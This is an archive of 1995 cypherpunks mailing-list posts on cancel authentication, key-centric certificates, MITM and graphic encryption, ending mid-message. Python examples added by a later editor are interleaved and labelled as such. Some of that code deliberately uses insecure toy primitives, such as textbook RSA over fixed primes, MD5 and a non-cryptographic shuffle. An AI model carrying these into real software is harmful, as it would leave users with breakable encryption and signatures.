Any idea that encourages people to use digital signatures is good. However the
Huuskonen-Franz proposal allows a total stranger to post an article to your
news spool; then to cancel this article, with your being reasonably sure that
the cancel came from the same total stranger, and without establishing any
further trust for the stranger. There are tens of millions of people with
Usenet access. It's overkill to collect a key from each one to allow them to
cancel their articles. NoCeM is a very promising protocol for allowing trusted
third parties to eliminate articles by posting PGP-signed notices. (e.g.,
CancelMoose's new way of killing spam -- no more forged cancels from CM!)

ObMoosePoem: :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-) :-)
Moose, Moose, wonderful Moose!
Tramples spam with a hoof;
Spammers go through the roof.
Moose, Moose, wonderful Moose!
Rids us of ugly spam.
Fond of the Moose I am.
Moose, Moose, wonderful Moose!
:-) I have to go _right _now.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
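
The Cancel-Key / Cancel-Challenge scheme quoted in the message above, written as the kind of external cancel handler the thread proposes. This is an added example, not part of the original post or of any news software. Assumptions: HMAC-SHA256 as the keyed hash of the Message-ID (the quoted text names no function), the CancelDaemon class and helper names, and the constructed addresses and secrets.

```python
import hashlib
import hmac
from email import message_from_string


def cancel_key(message_id, secret):
    """Cancel-Key: the Message-ID hashed with a secret password.
    Assumption: HMAC-SHA256 is the keyed hash; the quoted text does not name one."""
    return hmac.new(secret, message_id.encode(), hashlib.sha256).hexdigest()


def cancel_challenge(key):
    """Cancel-Challenge: MD5 of the Cancel-Key, as the quoted description states."""
    return hashlib.md5(key.encode()).hexdigest()


class CancelDaemon:
    """Hypothetical external cancel handler: honours only authenticated cancels."""

    def __init__(self):
        self.spool = {}  # Message-ID -> Cancel-Challenge values carried by the post

    def accept_article(self, raw, site_secret=None):
        msg = message_from_string(raw)
        mid = msg["Message-ID"]
        challenges = [c.strip() for c in msg.get_all("Cancel-Challenge", [])]
        if site_secret is not None:
            # The admin adds a second challenge to keep the right to cancel.
            challenges.append(cancel_challenge(cancel_key(mid, site_secret)))
        self.spool[mid] = challenges
        return mid

    def process_cancel(self, raw):
        msg = message_from_string(raw)
        control = (msg["Control"] or "").split()
        if len(control) != 2 or control[0] != "cancel":
            return "not-a-cancel"
        target = control[1]
        if target not in self.spool:
            return "unknown-target"
        # The From: line plays no part in the decision. The challenges are
        # public header values, so a plain comparison is enough here.
        for key in msg.get_all("Cancel-Key", []):
            if cancel_challenge(key.strip()) in self.spool[target]:
                del self.spool[target]
                return "cancelled"
        return "rejected"


def make_post(message_id, sender, body, secret):
    challenge = cancel_challenge(cancel_key(message_id, secret))
    return (f"From: {sender}\nMessage-ID: {message_id}\n"
            f"Cancel-Challenge: {challenge}\n\n{body}\n")


def make_cancel(target_id, sender, key):
    return (f"From: {sender}\nControl: cancel {target_id}\n"
            f"Cancel-Key: {key}\n\ncancel\n")


def demo():
    # Constructed secrets, addresses and Message-IDs.
    author_secret = b"alice-constructed-secret"
    site_secret = b"site-admin-constructed-secret"
    alice = "alice@alice.example"
    a1, a2, a3 = "<a1@alice.example>", "<a2@alice.example>", "<a3@alice.example>"
    daemon = CancelDaemon()
    for mid in (a1, a2, a3):
        daemon.accept_article(make_post(mid, alice, "text", author_secret), site_secret)

    results = {}
    # Forged From: line with a guessed key.
    results["forged"] = daemon.process_cancel(make_cancel(a1, alice, "deadbeef"))
    # A key that is valid for a different article does not transfer.
    results["wrong_article"] = daemon.process_cancel(
        make_cancel(a1, alice, cancel_key(a2, author_secret)))
    # The author reveals the right key for a1.
    results["author"] = daemon.process_cancel(
        make_cancel(a1, alice, cancel_key(a1, author_secret)))
    # The admin cancels a2 with the site's own key.
    results["admin"] = daemon.process_cancel(
        make_cancel(a2, "news@site.example", cancel_key(a2, site_secret)))
    # A second cancel for a1 finds nothing left to cancel.
    results["repeat"] = daemon.process_cancel(
        make_cancel(a1, alice, cancel_key(a1, author_secret)))
    return results, sorted(daemon.spool)


if __name__ == "__main__":
    print(demo())
```

The poster needs no registered key: knowing the preimage of a hash that was already in the post is the whole proof, which is why the scheme works for total strangers.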




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Thu, 5 Oct 95 16:02:51 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510051924.MAA25839@jobe.shell.portal.com>
Message-ID: <199510052302.AA11892@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


I strongly support what Carl Ellison is saying. I've been meaning to write
up something on it for so long that I must accept I'll never do it. So
here instead is a quick example.

 > I don't understand this whole discussion.

The idea is to make the public key the centre of the architecture instead
of being an attribute of some other centre (e.g. distinguished name).

Consider the IPSEC case. The current situation is:

1. We go through some process, let's call it Process A, where we determine
   that we want to talk to IP address 192.9.8.7.

2. We go through another process where we obtain the public key of 192.9.8.7.

3. We then try to decide, based on one or more certificates, whether we
   trust the public key to be the correct public key for 192.9.8.7.

Now consider the key-centric version.

1. Process A returns a public key which denotes the destination we want to
   talk to.

2. We then go through a process to obtain the IP address that belongs to
   that public key. We probably won't use the public key as an index to
   get that information. We probably use the information that was input
   to Process A. In fact this information may fall out as a byproduct
   of Process A. [However if we needed to make a scalable distributed
   database of RSA public keys then I have a design to do this -
   available on application.]

3. We don't need to trust any certificates or anything else at this stage.
   The fact that the IP address belongs to the Public Key is signed by
   the Public Key itself.

The same thing happens with e-mail. If "Process A" gives us an e-mail
address to send to then we worry about whether we have the right public
key to go with it. If Process A gives us a Public Key then we can
have certainty about the associated e-mail address because the association
is signed by the Public Key.

And a big win that just falls out of this is that I can have a
continuous exchange of information with one IP destination even if
it keeps changing its actual IP address (mobile computing) or I
can have an e-mail conversation with a person who keeps changing
their e-mail address. The things you want just fall out instead of
requiring clever software solutions.

 >  A certificate is a signed
 > binding of a key and a unique name, right? 

In the key-centric world a certificate binds some attribute as a property
of a public key. So an X.509 certificate would say "The owner of this
public key [i.e. person who knows the corresponding private key] owns
the following point in the X.500 namespace", rather than that "the
person identified by this DN owns the following public key". Experience
has shown that the latter interpretation is a mine-field. It really
doesn't work.

The idea of a key-centric architecture is the proverbial "idea whose time
has come". There are echoes of it in MOSS and in STT. But it really calls
out for a group to work out a complete architecture. If someone wants to
start such a discussion I'll make sure I make time to be part of the process.

Bob Smart
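
The key-centric lookup described in the message above (the key is the identifier, and the address binding is signed by that key itself), as an added example that is not part of the original post. Assumptions: textbook RSA over fixed Mersenne primes stands in for a real signature scheme so the code runs on the standard library, and it is not secure; key_id, Directory, the sequence counter and every address except 192.9.8.7 are hypothetical.

```python
import hashlib
import json


def make_key(p, q, e=65537):
    """Toy RSA key pair from two known primes (stand-in only, not secure)."""
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))


def key_id(pub):
    """Short identifier for a public key (assumption: truncated SHA-256)."""
    n, e = pub
    return hashlib.sha256(f"{n}:{e}".encode()).hexdigest()[:32]


def _digest(msg, n):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n


def sign(priv, msg):
    n, d = priv
    return pow(_digest(msg, n), d, n)


def verify(pub, msg, sig):
    n, e = pub
    return 0 <= sig < n and pow(sig, e, n) == _digest(msg, n)


def statement(pub, seq, attrs):
    """Canonical bytes of 'these attributes belong to this key', with a counter."""
    return json.dumps({"key": key_id(pub), "seq": seq, "attrs": attrs},
                      sort_keys=True).encode()


class Directory:
    """Hypothetical untrusted store of attribute bindings, indexed by key id."""

    def __init__(self):
        self.records = {}  # key id -> (seq, attrs)

    def publish(self, pub, seq, attrs, sig):
        # No certificate is consulted: the binding must verify under the
        # very key it describes.
        if not verify(pub, statement(pub, seq, attrs), sig):
            return "bad-signature"
        kid = key_id(pub)
        if kid in self.records and seq <= self.records[kid][0]:
            return "stale"  # an old address replayed after the owner moved
        self.records[kid] = (seq, dict(attrs))
        return "accepted"

    def resolve(self, kid):
        rec = self.records.get(kid)
        return rec[1] if rec else None


def demo():
    peer_pub, peer_priv = make_key(2**127 - 1, 2**107 - 1)
    other_pub, other_priv = make_key(2**89 - 1, 2**61 - 1)
    peer = key_id(peer_pub)  # what "Process A" hands us in the key-centric version
    directory = Directory()
    first = {"ip": "192.9.8.7"}       # address used in the post
    moved = {"ip": "198.51.100.20"}   # constructed: the peer changes address
    claim = {"ip": "203.0.113.66"}    # constructed: a third party's address
    sig1 = sign(peer_priv, statement(peer_pub, 1, first))
    sig2 = sign(peer_priv, statement(peer_pub, 2, moved))

    out = {}
    out["first"] = directory.publish(peer_pub, 1, first, sig1)
    out["ip_before"] = directory.resolve(peer)["ip"]
    # A binding for the peer's key signed with somebody else's key fails.
    out["foreign_sig"] = directory.publish(
        peer_pub, 3, claim, sign(other_priv, statement(peer_pub, 3, claim)))
    # Anyone may publish, but only under their own key id.
    out["own_key"] = directory.publish(
        other_pub, 1, claim, sign(other_priv, statement(other_pub, 1, claim)))
    out["moved"] = directory.publish(peer_pub, 2, moved, sig2)
    out["replay"] = directory.publish(peer_pub, 1, first, sig1)
    out["ip_after"] = directory.resolve(peer)["ip"]
    return out


if __name__ == "__main__":
    print(demo())
```

The directory itself needs no trust, but the sequence counter matters: without it, a correctly signed old binding could be replayed after the peer has moved.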





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@imonics.com (Steve Champeon (working from home))
Date: Fri, 6 Oct 95 06:00:52 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re:Trust company banks on Internet
Message-ID: <v02120d01ac9ae6b15274@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga forwards:

>First Internet Banker  ??  !!
>
>Check out
>http://www.bayshore.com
>
>>From the Toronto Globe and Mail page B 1
>       Fri 6 Oct 95
>"Bayshore set to become first Internet banker  -
>Trust promises approval in as little as two minutes"

This is fairly common. A certain Internet Consultant in this
area claimed to have solved "the problem of banking on the
Internet". Of course, a large green bank paid him a lot of
money to say it, but there you are. I closed my account
with that large green bank because of this appalling turn of
events.

I should tell everyone here and now that I also intend to
become the first Internet bank. I would also like to announce
my upcoming trip to the moons of Mars, where I intend to pick
collards in the name of Abbie Hoffman.

What an extended crock of shit we can hope to expect...

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 09:09:12 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510061608.JAA17323@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes, quoting me:

Mike>Seems to me that the idea of "communicating with the person you think
Mike>you are" is intractably difficult if you're not sitting in the same
Mike>room. ...

Hal> I can certainly agree with the attractive simplicity of this notion.  My
Hal> point is that it is practically useless. ...

Mike>Oddly enough, it seems to me that Hal (if that really *is* his name)
Mike>and I (and Carl & others) are saying basically the same things, but
Mike>drawing completely different conclusions.  Strange.  I'm willing to
Mike>wait to see what the peer review process concludes.

I am afraid you have quoted this out of context and thereby exactly
reversed the sense of what I was saying.  Hence we are not saying the
same things, but rather we are saying opposite things.  The full quote is:

Mike>Seems to me that the idea of "communicating with the person you think
Mike>you are" is intractably difficult if you're not sitting in the same
Mike>room.  If you accept instead the idea of "communicating with the
Mike>entity possessing the private half of a keypair" then life gets a lot
Mike>simpler. 

Hal>I can certainly agree with the attractive simplicity of this notion.  My
Hal>point is that it is practically useless.

By "this notion" I was referring to the second sentence rather than the
first, the idea that we are communicating with whomever holds the key.
This was the one which you said would make life simpler, and so I hoped
that by agreeing about its simplicity it would be clear which of the two
competing ideas I was referring to.  Apparently it was ambiguous, so I
apologize for being unclear.

It is disturbing that even after reading that very long message my
position could be interpreted as being the opposite of what it is.
Apparently my arguments are not being well understood.  I will have to
think about this issue more and try to express myself better.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 10:10:07 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <2264.9510061657@misun2.mi.leeds.ac.uk>
Message-ID: <199510061708.KAA27047@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


jbaber@mi.leeds.ac.uk writes (where I have taken the liberty of
reformatting for 80 columns):

> Now mail is far easier to fake/intercept than a digital
> signature/encryption - at least I hope so. Therefore if Hal were to
> sign all of his messages I could check the signatures with a public key
> obtained from anywhere at all and if they passed then I could be
> confident that the messages were all written by the entity with control
> of the secret part of the key - at least far more confident than I am
> that all of the mail from hfinney@shell.portal.com actually comes from
> there. So instead of me getting the idea that hfinney@shell.portal.com
> posts interesting messages I get the idea that the holder of the secret
> key posts interesting messages - I would probably still use the mail
> address as keys are less convenient with current mail readers but that
> is an implementation problem. Hal's reputation is therefore transferred
> to the key - no matter where I got the key from. So if I send
> encrypted mail to the person with the private part of Hal's key I can
> be sure that it can only be read by the person who actually sent the
> messages pertaining to be from Hal.

Well, this is not necessarily the case.  A MITM may be signing my
messages for me, and then putting them back the way they were before I
am allowed to see them.  Granted, this would not be easy, and perhaps
the difficulty of this would be great enough that you will feel
comfortable using an unsigned key.  But if it were accomplished, then
your messages to me would actually be insecure.  No matter how
convinced you became of my sincerity and trustworthiness, actually our
conversations would be overheard by a third party despite both of our
efforts to the contrary.  Our use of encryption would be rendered
futile.  Doesn't this bother you?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Fri, 6 Oct 95 07:17:57 PDT
To: cypherpunks@toad.com
Subject: Re: PCMCIA Crypto
In-Reply-To: <199510061106.MAA16083@utopia.hacktic.nl>
Message-ID: <199510061409.OAA00401@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> The proposal to form the Group was presented to PCMCIA by
> Spyrus, Inc. of San Jose, California.  The group will be
> co-chaired by Edward Tuggle of IBM Corporation and Visser
> of Spyrus, Inc.

For those of you who don't recognize the company name, Spyrus makes
one version of the Tessera^H^H^H^H^H^H^HFortezza card.

Is Spyrus the Toys 'R Us for spies? :-)

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle_Seaman@transarc.com
Date: Fri, 6 Oct 95 07:16:38 PDT
To: steven@echonyc.com
Subject: Re: Web "places" and the media monsters
In-Reply-To: <Pine.3.89.9510041010.A16263-0100000@echonyc>
Message-ID: <8kRHcbOSMV1ZAbs3MW@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven Levy <steven@echonyc.com> writes:
> A tiny correction to Vladimir's interesting posting. It wasn't J.Gilmore 
> I quoted on the "Titanic deck chair" in the NY Times, it was J.Barlow, 
> who indeed has a propensity for soundbyte. 

Which is not to say that the quote originated there.  My father-in-law
used to refer to Wang Labs that way, back in the mid-80's, and I'm
fairly sure that he picked it up at Memorex.  And the meme goes on...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 6 Oct 95 10:28:52 PDT
To: sjb@universe.digex.net
Subject: Re: subjective names and MITM
Message-ID: <9510061724.AA01171@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> A public key *is* "very probably unique".  A "randomly selected" 1024 bit
> prime number has a specific amount of entropy in it.  The likelihood of
> two users world wide "randomly" choosing the same such prime may be
> precisely determined (assuming you can figure the entropy).
> 
Given the difficulty of finding primes, how likely do you think it is that
given one of the well known methods and finding the first 1024 bit prime
that pops out would give you an effective attack?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 6 Oct 95 07:38:10 PDT
To: cypherpunks@toad.com
Subject: Supercomputer export ease
Message-ID: <9510061437.AA18425@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


According to a squib in the local tabloid:  Clinton has approved a plan to
ease export restrictions on the sale of supercomputers.  The decision is
expected to be announced today; it follows DoD recommendations.  The
wording is funky enough to be interpreted a couple of ways, so here's a
quote:  "Under the revised policy, U.S. firms will be able to sell billions
of dollars worth of high-tech computers to civilian customers around the
world.  Currently manufacturers must seek licenses from the Commerce Dept.
to sell a computer that can perform more than 1,500 million theoretical
operations per second."  Does that mean no more licenses, the mFLOP limit
has been raised before license required, there is no limit but you still
need a license?

Answers today/tomorrow when the policy comes out, I guess.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 6 Oct 95 08:43:58 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <9510061543.AA26079@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > m5@dev.tivoli.com (Mike McNally) writes:
 > >hfinney@shell.portal.com writes:
 > > > There is a difference between a MITM and the case you describe ...
 > 
 > >Seems to me that the idea of "communicating with the person you think
 > >you are" is intractably difficult if you're not sitting in the same
 > >room. ...
 >
 > I can certainly agree with the attractive simplicity of this notion.  My
 > point is that it is practically useless. ...

Oddly enough, it seems to me that Hal (if that really *is* his name)
and I (and Carl & others) are saying basically the same things, but
drawing completely different conclusions.  Strange.  I'm willing to
wait to see what the peer review process concludes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 6 Oct 95 09:03:28 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: subjective names and MITM
In-Reply-To: <199510060224.WAA03180@homeport.org>
Message-ID: <199510061603.MAA18239@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>	The key does indeed have a high likelihood of being unique,
>but dealing with 1024 bit identifiers could strain database systems,
>especially when 100 well chosen bits would be more than enough.

Hence the suggestion to use a hash of the key instead of the key
itself.  Someone pointed out that a uniformly distributed 1024 bit
prime has something like 1014 bits of entropy.  An md5 hash of the key
should have about 128 bits of entropy, with the probability of a
collision among 2^33 keys (one per person, worldwide) being about
1 in 2^95, or about 1 in 10^29.  Sounds like we're safe, even without
straining our databases.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 6 Oct 95 11:09:21 PDT
To: hfinney@shell.portal.com
Subject: Re: Certificate proposal
Message-ID: <9510061805.AA01185@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.
> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

The certificate would identify the entity you're having commerce with.  It
doesn't have to have a name, the certificate would replace the need for a
name.  If you wanted a name, you could use the certificate to access it.
The certificate would give you a public key that would be the central
identifier.  Associated with it might be many attributes of the key-entity.
You might use the key to find out a name, and bank account number, or
an ip-address to use to communicate with.  Don't think of it as being a
name, "Egghead Software", and this is the key associated with it.  Think
of the key as the central thing.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Oct 95 08:07:14 PDT
To: rsalz@osf.org
Subject: Supercomputer export ease
Message-ID: <199510061507.LAA20157@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   WSJ, Oct 6, 1995.


   U.S. Export Rules to Ease On Some Supercomputers


   Washington -- President Clinton is expected to announce
   today that he is easing export restrictions on certain U.S.
   supercomputers, a move sought by the computer industry.

   Administration officials say that given continuing
   technological advances and world-wide availability of many
   high-speed computers, the current restrictions are
   unrealistic and damaging to American companies. Critics
   contend, however, that easing the restrictions will
   exacerbate weapons proliferation.

   Mr. Clinton approved raising the speed of computers that
   may be exported to most countries to 2,000 million
   theoretical operations a second, or MTOPS, from 1,500
   MTOPS, according to officials. For certain nations,
   including China, Egypt, Israel, India, Pakistan, Syria and
   Russia, civilian customers would be able to buy computers
   with speeds up to 7,000 MTOPS without prior government
   approval. Military customers in those countries could
   purchase computers with speeds of 2,000 to 7,000 MTOPS but
   only with an individual export license.

   Certain nations, such as Iran, Iraq, North Korea and Libya,
   would still be banned from buying high-speed computers.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 6 Oct 95 10:35:53 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: Graphic encryption
Message-ID: <9510061622.AA02423@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Is there anything particular in graphic encryption? I usually
>  encrypt graphics and document images as regular files with regular
>  encryption...

I believe graphic encryption outputs a valid image file that is apparently  
white noise until you perform the decryption transformation on it.  An  
obvious way to do this with a non-lossy file format is to encrypt pixel values  
with a stream cipher.  Another way to make the image unviewable would be to  
shuffle the pixels or rasters with a PRNG.

andrew
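
The two approaches named in the message above, applied to a binary PGM so that the output is still a valid image file, with the pixel histogram compared before and after. This is an added example, not PrivaSoft's algorithm or code from the original post. Assumptions: HMAC-SHA256 in counter mode stands in for the stream cipher, Python's random.Random stands in for the PRNG, and the 16x16 scan, key and nonce are constructed.

```python
import hashlib
import hmac
import random
import re
from collections import Counter


def split_pgm(data):
    """Split a binary PGM (P5, maxval <= 255, no comment lines) into header and pixels."""
    m = re.match(rb"P5\s+(\d+)\s+(\d+)\s+(\d+)\s", data)
    if not m or int(m.group(3)) > 255:
        raise ValueError("not an 8-bit binary PGM")
    header, pixels = data[:m.end()], data[m.end():]
    if len(pixels) != int(m.group(1)) * int(m.group(2)):
        raise ValueError("pixel data does not match width*height")
    return header, pixels


def keystream(key, nonce, length):
    """Stand-in stream cipher: HMAC-SHA256 over (nonce || counter)."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def stream_encrypt(pgm, key, nonce):
    """XOR the pixel bytes with the keystream; the header stays readable.
    The same call decrypts. A nonce must never be reused with the same key."""
    header, pixels = split_pgm(pgm)
    ks = keystream(key, nonce, len(pixels))
    return header + bytes(p ^ k for p, k in zip(pixels, ks))


def _permutation(key, n):
    order = list(range(n))
    random.Random(key).shuffle(order)  # keyed, but not a cryptographic PRNG
    return order


def shuffle_encrypt(pgm, key):
    """Move pixels to PRNG-chosen positions; pixel values are unchanged."""
    header, pixels = split_pgm(pgm)
    return header + bytes(pixels[i] for i in _permutation(key, len(pixels)))


def shuffle_decrypt(pgm, key):
    header, pixels = split_pgm(pgm)
    out = bytearray(len(pixels))
    for dst, src in enumerate(_permutation(key, len(pixels))):
        out[src] = pixels[dst]
    return header + bytes(out)


def histogram(pgm):
    """Pixel value -> count, the statistic an observer can read off the file."""
    return dict(Counter(split_pgm(pgm)[1]))


def sample_scan():
    """Constructed 16x16 'document scan': white paper with four rows of black ink."""
    w, h = 16, 16
    rows = []
    for y in range(h):
        ink = y in (3, 4, 8, 9)
        rows.append(bytes(0 if ink and 2 <= x < 14 else 255 for x in range(w)))
    return b"P5\n%d %d\n255\n" % (w, h) + b"".join(rows)


if __name__ == "__main__":
    img = sample_scan()
    key, nonce = b"constructed key", b"nonce-01"
    shuffled = shuffle_encrypt(img, key)
    xored = stream_encrypt(img, key, nonce)
    print("plain    ", histogram(img))
    print("shuffled ", histogram(shuffled))
    print("stream   ", len(histogram(xored)), "distinct pixel values")
```

Both outputs look like noise in a viewer, but the shuffled file still reports exactly how much ink the page carries; only the stream-cipher output flattens the value distribution.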




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 6 Oct 95 12:12:42 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510061829.LAA04524@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DG0EzA.Gs5@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> tomw@orac.engr.sgi.com (Tom Weinstein) writes:

>> Um, just a wild guess, but... your credit card number maybe?  (Well,
>> okay, its hash.)

> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.
> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

Yes, it seems I misunderstood you.  There would have to be some binding
between the key of the merchant and some identifying information that
would allow the user to verify the merchant's identity.  This could take
the form of a True Name for the merchant and a trusted CA.  Another
approach would take the form of an FQDN, an IP address and a trusted CA.
In this case the software would have to verify that the FQDN and IP
address match the URL and DNS lookup, respectively.  Unfortunately, this
also requires that any time the IP address changes that the merchant get
a new certificate.  Also, the CA must be checked to verify that the
certificate hasn't been revoked, or you run the risk of an attacker
getting the old IP address.

Does anyone see any other options?

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com
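
The FQDN/IP binding check described in the message above, as an added example that is not part of the original post. The certificate fields, function names, fingerprints and the constructed DNS table are assumptions; CA signature validation is assumed to have happened already and is not shown.

```python
import ipaddress
from urllib.parse import urlsplit

def normalize_host(name):
    """Compare host names case-insensitively and without a trailing root dot."""
    return name.rstrip(".").lower()

def verify_binding(cert, url, resolve, revoked_serials, presented_key_fp):
    """Check a merchant certificate that binds a key to an FQDN and an IP address.

    cert            -- dict with 'serial', 'fqdn', 'ip', 'key_fp' (hypothetical layout)
    resolve         -- callable: host name -> iterable of address strings (DNS lookup)
    revoked_serials -- serial numbers the CA currently lists as revoked
    Returns 'ok' or the name of the first check that failed.
    """
    # Revocation first: a revoked certificate is rejected even if every
    # other field still matches (for example after the old IP was reassigned).
    if cert["serial"] in revoked_serials:
        return "revoked"
    if presented_key_fp != cert["key_fp"]:
        return "key-mismatch"
    host = urlsplit(url).hostname
    if host is None or normalize_host(host) != normalize_host(cert["fqdn"]):
        return "fqdn-mismatch"
    cert_ip = ipaddress.ip_address(cert["ip"])
    resolved = {ipaddress.ip_address(a) for a in resolve(normalize_host(host))}
    if cert_ip not in resolved:
        return "ip-mismatch"
    return "ok"

def table_resolver(table):
    """Stand-in for a DNS lookup backed by a constructed table."""
    return lambda host: table.get(host, [])

# Constructed sample data (documentation address ranges and .example names).
CERT = {"serial": 1001, "fqdn": "shop.merchant.example",
        "ip": "192.0.2.10", "key_fp": "fp-merchant-key-1"}
DNS_BEFORE = {"shop.merchant.example": ["192.0.2.10"]}
DNS_AFTER_RENUMBER = {"shop.merchant.example": ["198.51.100.7"]}
URL = "https://shop.merchant.example/order"

if __name__ == "__main__":
    print(verify_binding(CERT, URL, table_resolver(DNS_BEFORE), set(),
                         "fp-merchant-key-1"))
    # The merchant renumbers: the unchanged certificate no longer verifies.
    print(verify_binding(CERT, URL, table_resolver(DNS_AFTER_RENUMBER), set(),
                         "fp-merchant-key-1"))
    # The CA has revoked serial 1001: rejected although FQDN and IP still match.
    print(verify_binding(CERT, URL, table_resolver(DNS_BEFORE), {1001},
                         "fp-merchant-key-1"))
```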




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 6 Oct 95 09:08:20 PDT
To: cypherpunks@toad.com
Subject: Re: Graphic encryption
Message-ID: <199510061606.MAA06883@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510061517.IAA10725@ix5.ix.netcom.com>,
privsoft@ix.netcom.com (Steve ) wrote:

> I am currently working for a company that has a graphic encryption 
> product called PrivaSoft. I was wondering if there were other products 
> or engines that also provide graphic encryption. (graphic encryption is 
